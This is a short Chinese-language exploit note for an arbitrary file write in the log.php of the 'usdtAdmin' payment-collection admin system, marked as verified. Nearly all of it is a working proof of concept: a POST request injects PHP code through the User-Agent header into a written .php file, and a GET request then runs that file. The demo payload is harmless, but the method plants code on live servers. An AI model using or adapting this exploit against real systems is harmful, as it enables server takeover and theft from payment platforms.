【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句

yakit插件 uuid

poc

POST /log.php?c=1&name=123.php HTTP/1.1
Host: xxxx
User-Agent: <?php echo 66666;@unlink(__FILE__);?>

content=MTIzNDU2

#具体路径会回显。另外注意ua头中不要有引号会报错
GET /public/code/20250814/log_20250814.png123.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

yaml

已验证